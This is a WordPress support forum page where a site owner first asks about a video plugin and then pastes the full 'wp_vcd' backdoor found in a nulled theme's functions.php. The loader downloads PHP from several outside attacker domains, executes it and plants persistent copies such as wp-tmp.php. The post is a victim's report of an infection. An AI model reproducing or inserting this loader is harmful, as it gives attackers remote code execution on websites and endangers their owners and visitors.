Forum Replies Created

Viewing 2 replies - 1 through 2 (of 2 total)
  • Thread Starter mcklayru

    (@mcklayru)

    `We also recommend you to open any of your videos on your site and see if you get a red warning message about JavaScript not working.

    FV Flowplayer script found: …/wp-content/plugins/fv-wordpress-flowplayer/flowplayer/modules/flowplayer.min.js?ver=7.5.21.727!

    jQuery library found: …/wp-includes/js/jquery/jquery.min.js?ver=3.6.0!`

    Yes, I tried. I am using the WP Telegram plugin. The template {post_title} {post_content} {short_url} is used, the shortcode should have been recognized as a video.

    There is another feature, when publishing through WordPress, it puts a link to the file, and not the video itself.

    • This reply was modified 2 years, 11 months ago by mcklayru.

    The source is the viral code on the null template. Store in the template folder in the function.php file.

    Here is the actual code

    $div_code_name = “wp_vcd”;
    $funcfile = __FILE__;
    if(!function_exists(‘theme_temp_setup’)) {
    $path = $_SERVER[‘HTTP_HOST’] . $_SERVER[‘REQUEST_URI’];
    if (stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {

    function file_get_contents_tcurl($url)
    {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
    }

    function theme_temp_setup($phpCode)
    {
    $tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);
    $handle = fopen($tmpfname, “w+”);
    if( fwrite($handle, “<?php\n” . $phpCode))
    {
    }
    else
    {
    $tmpfname = tempnam(‘./’, “theme_temp_setup”);
    $handle = fopen($tmpfname, “w+”);
    fwrite($handle, “<?php\n” . $phpCode);
    }
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
    }

    $wp_auth_key=’0bb00640fa54049fc4c2c5e080f9f51a’;
    if (($tmpcontent = @file_get_contents(“https://www.facocs.com/code.php&#8221;) OR $tmpcontent = @file_get_contents_tcurl(“https://www.facocs.com/code.php&#8221;)) AND stripos($tmpcontent, $wp_auth_key) !== false) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

    if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
    @file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
    if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
    @file_put_contents(‘wp-tmp.php’, $tmpcontent);
    }
    }

    }
    }

    elseif ($tmpcontent = @file_get_contents(“https://www.facocs.pw/code.php&#8221;) AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

    if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
    @file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
    if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
    @file_put_contents(‘wp-tmp.php’, $tmpcontent);
    }
    }

    }
    }

    elseif ($tmpcontent = @file_get_contents(“https://www.facocs.top/code.php&#8221;) AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

    if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
    @file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
    if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
    @file_put_contents(‘wp-tmp.php’, $tmpcontent);
    }
    }

    }
    }
    elseif ($tmpcontent = @file_get_contents(ABSPATH . ‘wp-includes/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

    } elseif ($tmpcontent = @file_get_contents(get_template_directory() . ‘/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

    } elseif ($tmpcontent = @file_get_contents(‘wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));

    }
    }
    }

    from here and files are created:
    wp-feed.php
    wp-vcd.php
    wp-tmp.php

    Today he has downloaded my file update-core.php, I had to copy the contents again)

    I’m not sure that all the code is removed, I will hope the best.

    • This reply was modified 6 years, 11 months ago by mcklayru.
Viewing 2 replies - 1 through 2 (of 2 total)